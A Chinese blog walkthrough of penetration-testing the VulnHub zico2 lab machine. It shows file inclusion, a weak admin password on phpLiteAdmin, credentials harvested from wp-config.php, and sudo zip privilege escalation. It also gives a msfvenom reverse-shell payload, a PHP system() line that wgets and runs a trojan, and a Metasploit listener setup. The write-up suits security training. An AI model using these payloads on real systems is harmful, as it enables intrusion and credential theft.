靶机渗透实战(1)–zico2渗透实战
作者:互联网
靶机下载地址为:https://download.vulnhub.com/zico/zico2.ova
Kali攻击机IP地址:192.168.49.235
Zico2靶机IP:192.168.49.30
目录
信息收集
首先查看自己IP地址如下图,IP地址是192.168.49.235
使用netdiscover命令来查看本地存活的IP地址
netdiscover -i eth0 -r 192.168.49.0/24
靶机的IP地址是:192.168.49.30
端口扫描
使用masscan来扫描端口
但是我不知道为什么我这扫不出来
使用nmap来扫描开放的端口,nmap有些时候扫不全
开放的端口有22,80,111
80为http端口我们直接用IP地址访问,然后乱点一通,发现没啥东西
然后在一个URL上面发现了类似于"?page="的东西,可能有文件包含
如下红圈
读取一下/etc/passwd,发现读取不出来,可能是不在这个目录,输入一堆"…/"
发现能成功读取出来证明有文件读取漏洞
目录扫描
使用命令dirb IP地址或者域名来扫描
dirb http://192.168.49.30
发现出来一堆
http://192.168.49.30/css
访问dbname的时候发现是个数据库后台地址
渗透测试
发现CMS是phpLiteAdmin
我们使用命令searchsploit命令来查找这个CMS是否有啥漏洞
是有远程命令执行漏洞
刚才发现的dbadmin直接访问里面的php,我们先使用弱密码来登录,比如admin,或者123456之类的密码
发现就进去了???这估计是我进的最快的一次,弱密码是admin
如果出不来,可以用弱密码爆破
如果进了后台我们先查看自带的数据库里面的内容
如下,发现出现了root密码和zico的密码,密码被md5加密了
我们使用在线网站解密如下
在线解密
解密出来分别是
账户root 密码 34kroot34
账户Zico 密码 zico2215@
SSH尝试远程登录
发现两个账户登录都全部失败
只能另寻出路
前面发现了文件包含和php命令执行,下面说思路
第一个方法是中国菜刀,第二个方法是KALI生成一个Linux的shell木马,然后让靶机下载并且运行木马,但是在此之前先要验证一下
先在数据库里面创建一个数据库 > 创建表
内容是:<?php info();?>
作用是测试是否执行了phpinfo的信息
查看字段内容
就在刚才发现的文件包含那边读取一下
http://192.168.49.30/view.php?page=…/…/…/…/usr/databases/msf
成功能访问出phpinfo()
中国菜刀
如果能像上面一样执行,那我们就可以写入一句话木马然后用菜刀来连接了
新建一个数据库 > 创建表 >插入数据,操作和上面一样,如下图
最后我们在访问试试,菜刀连接成功,接下来就可以随意访问了,测试之后,发现root目录进不去其他都可以
经过测试在home/Zico下发现了可利用的东西
发现了wordpress目录
一般在wordpress里面有个配置文件叫做wp-config.php的文件
这个文件有记录了数据库的信息密码之类的东西
打开wp-config.php
发现了账户和密码
账户是:zico 密码是:sWfCsfJSPV9H3AmQzw8
就可以使用这个账户密码去SSH连接试试了
但是我最开始以为这个密码需要解密,结果不需要
SSH连接成功
就可以开始提权操作
touch 1.txt
sudo -u root zip 1.zip 1.txt -T --unzip-command="sh -c /bin/bash"
提权成功flag就在root目录下面
木马操作
因为靶机要从我们KALI下载文件,所以我们要在KALI上面开启http服务
开启apach2:service apach2 start
然后进入网站目录
cd /var/www/html
然后在html目录里面生成木马
msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.49.235 LPORT=4444 -f elf -o shell
和上面一样创建一个数据库和表内容写入的是
<?php system("cd /tmp;wget http://192.168.49.30/muma;chmod 777 muma;./muma");?>
意思就是先进入tmp目录,因为tmp目录有运行存在,然后wget下载KALI的木马,然后chmod 777给muma赋值777的权限,然后./muma,运行木马
最后会在KALI里面返回webshell
然后在KALI里面打开msf工具
命令如下,然后就开启了监听
msf > use exploit/multi/handler
msf exploit(multi/handler) > set LHOST 192.168.204.155
LHOST => 192.168.204.155
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.204.155:4444
这时候我们就可以直接去访问一下刚才在数据库上的木马文件
然后查看监听状态,发现返回了meterpreter
输入命令shell,将shell修改为交互式tty
python -c 'import pty;pty.spawn("/bin/bash")'
提权
然后就和上面菜刀操作一样
进入Zico目录下面的 wordpress目录里面的wp-config.php目录查看账户和密码就能登录Zico账户,之后的操作就和菜刀操作一样了
标签:实战,渗透,192.168,zico2,密码,木马,IP地址,msf,目录 来源: https://blog.csdn.net/kengkeng123qwe/article/details/120798176